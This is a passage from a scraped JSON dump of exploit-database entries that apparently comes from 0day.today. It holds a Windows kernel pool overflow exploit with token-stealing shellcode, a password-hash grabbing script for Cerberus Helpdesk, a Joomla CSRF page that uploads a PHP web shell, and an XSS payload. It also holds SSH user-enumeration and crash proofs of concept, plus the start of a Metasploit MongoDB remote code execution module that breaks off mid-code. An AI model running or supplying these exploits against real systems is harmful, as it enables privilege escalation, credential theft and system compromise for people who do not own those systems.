SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Name\", LSA_UNICODE_STRING),\r\n(\"Reserved\", ULONG * 22),\r\n]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n_fields_ = [\r\n(\"dwSize\", c_ulong),\r\n(\"cntUsage\", c_ulong),\r\n(\"th32ProcessID\", c_ulong),\r\n(\"th32DefaultHeapID\", c_int),\r\n(\"th32ModuleID\", c_ulong),\r\n(\"cntThreads\", c_ulong),\r\n(\"th32ParentProcessID\", c_ulong),\r\n(\"pcPriClassBase\", c_long),\r\n(\"dwFlags\", c_ulong),\r\n(\"szExeFile\", c_wchar * MAX_PATH)\r\n]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n\"\"\"\r\nConvert signed to unsigned integer.\r\n\"\"\"\r\nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\nreturn unsigned\r\n\r\ndef get_type_info(handle):\r\n\"\"\"\r\nGet the handle type information to find our sprayed objects.\r\n\"\"\"\r\npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\nsize = DWORD(sizeof(public_object_type_information))\r\nwhile True:\r\nresult = signed_to_unsigned(\r\nntdll.NtQueryObject(\r\nhandle, 2, byref(public_object_type_information), size, None))\r\nif result == STATUS_SUCCESS:\r\nreturn public_object_type_information.Name.Buffer\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(public_object_type_information, size.value)\r\nelif result == STATUS_INVALID_HANDLE:\r\nreturn None\r\nelse:\r\nraise x_file_handles(\"NtQueryObject.2\", hex (result))\r\n\r\ndef get_handles():\r\n\"\"\"\r\nReturn all the processes handles in the system at the time.\r\nCan be done from LI (Low Integrity) level on Windows 7 x86.\r\n\"\"\"\r\nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\nsize = DWORD (sizeof (system_handle_information))\r\nwhile True:\r\nresult = ntdll.NtQuerySystemInformation(\r\nSystemExtendedHandleInformation,\r\nbyref(system_handle_information),\r\nsize,\r\nbyref(size)\r\n)\r\nresult = signed_to_unsigned(result)\r\nif result == STATUS_SUCCESS:\r\nbreak\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(system_handle_information, size.value)\r\nelse:\r\nraise x_file_handles(\"NtQuerySystemInformation\", hex(result))\r\n\r\npHandles = cast(\r\nsystem_handle_information.Handles,\r\nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\nsystem_handle_information.NumberOfHandles)\r\n)\r\nfor handle in pHandles.contents:\r\nyield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n\"\"\"\r\nThis function allocates the shellcode @ the null page making\r\nsure the new OkayToCloseProcedure pointer points to shellcode.\r\n\"\"\"\r\nbaseadd = c_int(0x00000004)\r\nnull_size = c_int(0x1000)\r\n\r\ntokenstealing = (\r\n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n\"\\x00\" )\r\n\r\nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n# first we restore our smashed TypeIndex\r\nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c\r\nsc += tokenstealing\r\nsc += \"\\x90\" * (0x400-len(sc))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(null_size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our junk to the null paged memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_spray():\r\n\"\"\"\r\nSpray the Kernel Pool with IoCompletionReserve and Event Objects.\r\nThe IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.\r\nThese are allocated from the Nonpaged kernel pool.\r\n\"\"\"\r\nhandles = []\r\nIO_COMPLETION_OBJECT = 1\r\nfor i in range(0, 25000):\r\nhandles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\nhHandle = HANDLE(0)\r\nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n# could do with some better validation\r\nif len(handles) > 0:\r\nreturn True\r\nreturn False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n\"\"\"\r\nCraft our special buffer to trigger the overflow.\r\n\"\"\"\r\nprint \"(+) allocating pool overflow input buffer\"\r\nbaseadd = c_int(base)\r\nsize = c_int(input_size)\r\ninput = \"\\x41\" * 0x18 # offset to size\r\ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n\r\n# repair the allocated chunk header...\r\ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n\r\n# filler\r\ninput += \"\\x44\" * (input_size-len(input))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our input buffer memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n\"\"\"\r\nThis triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n\"\"\"\r\nGENERIC_READ = 0x80000000\r\nGENERIC_WRITE = 0x40000000\r\nOPEN_EXISTING = 0x3\r\nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\ndwReturn = c_ulong()\r\ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\ninputbuffer = 0x41414141\r\ninputbuffer_size = 0x5000\r\noutputbuffer_size = 0x5000\r\noutputbuffer = 0x20000000\r\nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\nIoStatusBlock = c_ulong()\r\n\r\nif driver_handle:\r\ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\nreturn True\r\nreturn False\r\n\r\ndef we_can_make_pool_holes():\r\n\"\"\"\r\nThis makes the pool holes that will coalesce into a hole of size 0x460.\r\n\"\"\"\r\nglobal khandlesd\r\nmypid = os.getpid()\r\nkhandlesd = {}\r\nkhandlesl = []\r\n\r\n# leak kernel handles\r\nfor pid, handle, obj in get_handles():\r\n\r\n# mixed object attack\r\nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\nkhandlesd[obj] = handle\r\nkhandlesl.append(obj)\r\n\r\n# Find holes and make our allocation\r\nholes = []\r\nfor obj in khandlesl:\r\n\r\n# obj address is the handle address, but we want to allocation\r\n# address, so we just remove the size of the object header from it.\r\nalloc = obj - 0x30\r\n\r\n# Get allocations at beginning of the page\r\nif (alloc & 0xfffff000) == alloc:\r\nbin = []\r\n\r\n# object sizes\r\nCreateEvent_size = 0x40\r\nIoCompletionReserve_size = 0x60\r\ncombined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\noffset = IoCompletionReserve_size\r\nfor i in range(offset, offset + (7 * combined_size), combined_size):\r\ntry:\r\n# chunks need to be next to each other for the coalesce to take effect\r\nbin.append(khandlesd[obj + i])\r\nbin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\nexcept KeyError:\r\npass\r\n\r\n# make sure it's contiguously allocated memory\r\nif len(tuple(bin)) == 14:\r\nholes.append(tuple(bin))\r\n\r\n# make the holes to fill\r\nfor hole in holes:\r\nfor handle in hole:\r\nkernel32.CloseHandle(handle)\r\nreturn True\r\n\r\ndef trigger_lpe():\r\n\"\"\"\r\nThis function frees the IoCompletionReserve objects and this triggers the\r\nregistered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n\"\"\"\r\n# free the corrupted chunk to trigger OkayToCloseProcedure\r\nfor k, v in khandlesd.iteritems():\r\nkernel32.CloseHandle(v)\r\nos.system(\"cmd.exe\")\r\n\r\ndef main():\r\nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\nif release() != \"7\" or architecture()[0] != \"32bit\":\r\nprint \"(-) although this exploit may work on this system,\"\r\nprint \" it was only designed for Windows 7 x86.\"\r\nsys.exit(-1)\r\n\r\nprint \"(+) spraying pool with mixed objects...\"\r\nif we_can_spray():\r\nprint \"(+) sprayed the pool!\"\r\nprint \"(+) making pool holes...\"\r\nif we_can_make_pool_holes():\r\nprint \"(+) made the pool holes!\"\r\nprint \"(+) allocating shellcode...\"\r\nif we_can_alloc_shellcode():\r\nprint \"(+) allocated the shellcode!\"\r\nprint \"(+) triggering pool overflow...\"\r\nif we_can_trigger_the_pool_overflow():\r\nprint \"(+) elevating privileges!\"\r\ntrigger_lpe()\r\n\r\nif __name__ == '__main__':\r\nmain()<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/28439", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T21:04:52", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "1337DAY-ID-25438", "href": "https://0day.today/exploit/description/25438", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (1)", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n \r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n \r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n \r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n \r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n \r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n \r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n \r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n \r\n(Valid users will result in higher total time).\r\n \r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n \r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n \r\nEddie Harari\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25438"}, {"lastseen": "2018-04-09T17:40:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-03-07T00:00:00", "published": "2016-03-07T00:00:00", "id": "1337DAY-ID-24947", "href": "https://0day.today/exploit/description/24947", "type": "zdt", "title": "Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure", "sourceData": "#!/bin/bash\r\n#####################################################################################\r\n# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #\r\n# Date: 04.02.2016 #\r\n# Exploit Author: asdizzle_ #\r\n# Vendor Homepage: http://www.cerberusweb.com/ #\r\n# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #\r\n# Version: 5 - 6.7 #\r\n# Tested on: Debian 8 / apache2 with cerb 5 #\r\n#####################################################################################\r\n# Prerequisites: #\r\n# -At least one worker must be logged in #\r\n# -/storage/tmp/ dir must be accessible #\r\n# #\r\n# If everything else fails try if there's directory listing in /storage/tmp #\r\n# You might find attachments and even support tickets. #\r\n#####################################################################################\r\n \r\nurl='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)\r\npre='devblocks' # If this doesn't work try 'zend'\r\n \r\necho \"[*] Trying to fetch cache file\"\r\n \r\ncachechk=$(curl -s $url\"/storage/tmp/\"$pre\"_cache---ch_workers\" | grep pass)\r\nif [ -z \"$cachechk\" ];then\r\n echo \"[-] File not found.\"\r\n exit\r\nelse\r\n echo \"[+] Found. Extracting...\"\r\n hashes=$(echo \"$cachechk\" | sed -e 's/s:5/\\n/g' | grep email | cut -d '\"' -f4,8 | sed 's/\"/:/g')\r\n if [ -z \"$hashes\" ];then\r\n echo \"[-] Hash extracting failed\"\r\n else\r\n echo \"[+] Extracting seems to have worked\"\r\n echo\r\n echo \"$hashes\"\r\n fi\r\nfi\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24947"}, {"lastseen": "2018-01-03T11:02:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "1337DAY-ID-24935", "href": "https://0day.today/exploit/description/24935", "type": "zdt", "title": "Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities", "sourceData": "JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and\r\nXSS vulnerabilities\r\n---------------------------------------------------------\r\n \r\nProduct: JSN PowerAdmin Joomla! Extension\r\nVendor: JoomlaShine.com\r\nTested Versions: 2.3.0\r\nOther Vulnerable Versions: Prior versions may also be affected\r\nVendor Notification: 28th January, 2016\r\nAdvisory Publication: 24th February, 2016\r\nCVE Reference: Pending\r\nRatioSec Advisory Reference: RS-2016-001\r\nRisk Level: High\r\nCVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\r\n \r\n---------------------------------------------------------\r\n \r\nRatioSec Research has discovered two cross-site request forgery and\r\nreflected cross-site scripting vulnerabilities in JSN PowerAdmin\r\nJoomla! Extension which can be exploited, respectively, to upload PHP\r\nfiles and run arbitrary HTML and script code in a user's browser\r\nsession in context of the affected web site.\r\n \r\n1) The application allows users to perform certain actions via HTTP\r\nrequests without performing proper checks to verify the requests\r\nvalidity. An authenticated user's browser can be forced to upload PHP\r\nfiles via the extension installer and subsequently execute arbitrary\r\ncommands with the web server privileges by tricking the user into\r\nvisiting a malicious web site.\r\n \r\n2) Input passed to `identified_name` GET parameter when `package` is\r\nset, `option` is set to `com_poweradmin`, `view` is set to\r\n`installer`, and `task` is set to `installer.install` in\r\n`/administrator/index.php` is not properly sanitised before being\r\nreflected. This can be exploited to run arbitrary HTML and script code\r\nin a user's browser session in context of the affected web site.\r\n \r\n---------------------------------------------------------\r\n \r\nProof of Concept\r\n \r\nRead the advisory details on the RatioSec Research website for the\r\nproof of concept code.\r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\n----------------------------------------------------------\r\n \r\nSolution\r\n \r\nNo official solution is currently available.\r\n \r\n----------------------------------------------------------\r\n \r\nTimeline\r\n \r\n- First contact: 27th January, 2016\r\n- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.\r\n- E-mail notice after no response: 02nd February, 2016\r\n- Advisory Publication: 24th February, 2016\r\n \r\n----------------------------------------------------------\r\n \r\nAdvisory URL\r\n \r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\nRatioSec Research\r\n \r\nMail: research at ratiosec dot com\r\nWeb: http://www.ratiosec.com/\r\nTwitter: https://twitter.com/ratio_sec\r\n \r\n \r\n \r\n----------------\r\nProof Of Concept\r\n \r\n1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.\r\n \r\n<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install\", true);\r\n xhr.setRequestHeader(\"Accept\", \"*/*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------167969427914885435381146171168\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------167969427914885435381146171168\\r\\n\" +\r\n \"Content-Disposition: form-data; name=\\\"package\\\"; filename=\\\"bd.phtml\\\"\\r\\n\" +\r\n \"Content-Type: application/octet-stream\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\x3cscript language=\\\"php\\\"\\x3esystem($_GET['cmd']);\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"-----------------------------167969427914885435381146171168--\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i);\r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\nThe file extension .phtml and the <script language=\"php\"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.\r\n \r\nCommand Execution\r\n \r\n2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator\u2019s browser.\r\n \r\nhttp://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert(\"RatioSecResearch\")>\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24935"}, {"lastseen": "2018-03-01T03:39:30", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "id": "1337DAY-ID-25723", "href": "https://0day.today/exploit/description/25723", "type": "zdt", "title": "Adobe Flash MovieClip.lineStyle - Use-After-Frees", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=558\r\n \r\nThere are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. A PoC is as follows:\r\n \r\nthis.createEmptyMovieClip(\"triangle_mc\", this.getNextHighestDepth());\r\nvar o = {toString: func};\r\ntriangle_mc.lineStyle(5, 0xff00ff, 100, true, o, \"round\", \"miter\", 1);\r\n \r\nfunction func(){\r\n \r\n triangle_mc.removeMovieClip();\r\n return \"none\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25723"}, {"lastseen": "2018-04-12T19:45:00", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "1337DAY-ID-20700", "href": "https://0day.today/exploit/description/20700", "type": "zdt", "title": "Elecard MPEG Player 5.8 Local PoC", "sourceData": "#!/usr/bin/python \r\n# Exploit Title:Elecard MPEG Player 5.8 Local PoC \r\n# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip\r\n# Product: Vulnerable\r\n# Elecard MPEG Player,Elecard AVC HD Player\r\n# RST\r\n# Date (found): 27.04.2013\r\n# Date (publish): 27.04.2013\r\n# Author: metacom\r\n# version:5.8.121004\r\n# Category: poc\r\n# Tested on: windows 7 German \r\n\r\nhead=\"#EXTM3U\\n\"\r\nhead+=\"#EXTINF:153,Artist - song\\n\"\r\nfilename= \"elecard.m3u\"\r\n\r\nbuffer= \"\\x41\" * 783\r\nbuffer+=\"\\x42\" * 4 \r\nbuffer+=\"\\x43\" * 4\r\nbuffer+=\"\\x44\" * 25000\r\n\r\ntextfile = open(filename , 'w')\r\ntextfile.write(head+buffer)\r\ntextfile.close()\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20700"}, {"lastseen": "2018-04-12T01:52:34", "bulletinFamily": "exploit", "description": "This Metasploit module exploits the nativeHelper feature from spiderMonkey which allows control over execution by calling it with specially crafted arguments. This Metasploit module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "id": "1337DAY-ID-20597", "href": "https://0day.today/exploit/description/20597", "type": "zdt", "title": "MongoDB nativeHelper.apply Remote Code Execution Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'MongoDB nativeHelper.apply Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploit a the nativeHelper feature from spiderMonkey which allows to\r\n to control execution by calling it wit specially crafted arguments. This module\r\n has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.\r\n },\r\n 'Author' =>\r\n [\r\n 'agix' # @agixid # Vulnerability discovery and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1892' ],\r\n [ 'OSVDB', '91632' ],\r\n [ 'BID', '58695' ],\r\n [ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'Linux - mongod 2.2.3 - 32bits',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'mmap' => [\r\n 0x0816f768, # [email\u00a0protected] # from mongod\r\n 0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod\r\n 0x31337000,\r\n 0x00002000,\r\n 0x00000007,\r\n 0x00000031,\r\n 0xffffffff,\r\n 0x00000000,\r\n 0x00000000,\r\n 0x0816e4c8, # [email\u00a0protected] # from mongod\r\n 0x31337000,\r\n 0x31337000,\r\n 0x0c0b0000,\r\n 0x00002000\r\n ],\r\n 'ret' => 0x08055a70, # ret # from mongod\r\n 'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]\r\n # These gadgets need to be composed with bytes < 0x80\r\n 'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP\r\n 'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2\r\n 'gadget4' => 0x08055a6c, # pop eax / ret\r\n 'gadget5' => 0x08457158 # xchg esp,eax\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 24 2013',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(27017),\r\n OptString.new('DB', [ true, \"Database to use\", \"admin\"]),\r\n OptString.new('COLLECTION', [ false, \"Collection to use (it must to exist). Better to let empty\", \"\"]),\r\n OptString.new('USERNAME', [ false, \"Login to use\", \"\"]),\r\n OptString.new('PASSWORD', [ false, \"Password to use\", \"\"])\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n begin\r\n connect\r\n if require_auth?\r\n print_status(\"Mongo server #{datastore['RHOST']} use authentication...\")\r\n if !datastore['USERNAME'] || !datastore['PASSWORD']\r\n disconnect\r\n fail_with(Exploit::Failure::BadConfig, \"USERNAME and PASSWORD must be provided\")\r\n end\r\n if do_login==0\r\n disconnect\r\n fail_with(Exploit::Failure::NoAccess, \"Authentication failed\")\r\n end\r\n else\r\n print_good(\"Mongo server #{datastore['RHOST']} doesn't use authentication\")\r\n end\r\n\r\n if datastore['COLLECTION'] && datastore['COLLECTION'] != \"\"\r\n collection = datastore['COLLECTION']\r\n else\r\n collection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')\r\n if read_only?(collection)\r\n disconnect\r\n fail_with(Exploit::Failure::BadConfig, \"#{datastore['USERNAME']} has read only access, please provide an existent collection\")\r\n else\r\n print_good(\"New document created in collection #{collection}\")\r\n end\r\n end\r\n\r\n print_status(\"Let's exploit, heap spray could take some time...\")\r\n my_target = target\r\n shellcode = Rex::Text.to_unescape(payload.encoded)\r\n mmap = my_target['mmap'].pack(\"V*\")\r\n ret = [my_target['ret']].pack(\"V*\")\r\n gadget1 = \"0x#{my_target['gadget1'].to_s(16)}\"\r\n gadget2 = Rex::Text.to_hex([my_target['gadget2']].pack(\"V\"))\r\n gadget3 = Rex::Text.to_hex([my_target['gadget3']].pack(\"V\"))\r\n gadget4 = 